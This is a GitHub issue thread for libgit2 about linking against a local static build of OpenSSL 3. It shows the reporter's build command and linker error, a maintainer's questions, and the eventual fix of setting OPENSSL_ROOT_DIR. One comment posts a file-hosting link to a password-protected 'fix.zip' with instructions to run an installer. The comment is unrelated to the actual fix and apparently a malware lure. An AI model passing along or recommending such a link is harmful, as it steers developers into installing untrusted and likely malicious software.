### ISSUE TITLE
Unclear how to link with OpenSSL 3

### ISSUE THREAD

**Issue by d94pn** [libgit2/libgit2#6869]
When building libgit2 it is not clear how to properly build with OpenSSL 3. By deafult, OpenSSL 1 on my system is linked with dynamically but I want to link (statically) with a local build of Open SSL 3. The only way to configure this is to set the OPENSSL_SSL_LIBRARY and OPENSSL_CRYPTO_LIBRARY variables when running "cmake .." but I just modifying the linking can cleary not be sufficient since OpenSSL 3 is not backward compatible with OpenSSL 1. And sure enough I get linking error.

### Reproduction steps

cmake .. -DOPENSSL_SSL_LIBRARY=<some path>/Downloads/openssl-3.3.0/libssl.a -D OPENSSL_CRYP
TO_LIBRARY=<some path>/Downloads/openssl-3.3.0/libcrypto.a
cmake --build .

### Expected behavior

At least a clear description of which OpenSSL versions are supported and how the build process selects either and how to override this selection if possible.

### Actual behavior

<some path>/Downloads/libgit2-1.8.1/src/libgit2/streams/openssl.c:398: undefined reference to `SSL_get_peer_certificate'

### Version of libgit2 (release number or SHA1)

1.8.1

### Operating system(s) tested

RHEL 8.6

**Comment by TrymenT-AlphA** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ethomson** [comment]
Is the problem OpenSSL 3 or dynamic linking? Is there a backward compatibility mode for OpenSSL 3? I ask because I can build, link, and run against a typical (shared library) build of OpenSSL 3.3.2 without any difficulty.

**Comment by d94pn** [comment]
The problem is scanty documentation. I finally stumbled upon this tip, hidden in an error message:

```
-- Could NOT find OpenSSL, try to set the path to OpenSSL root folder in the system variable OPENSSL_ROOT_DIR
```

Indeed, setting OPENSSL_ROOT_DIR resolved my issue. But it is not mentioned in the README file.

**Comment by ethomson** [comment]
I see; that's helpful feedback; I updated the README to include this. 🙏
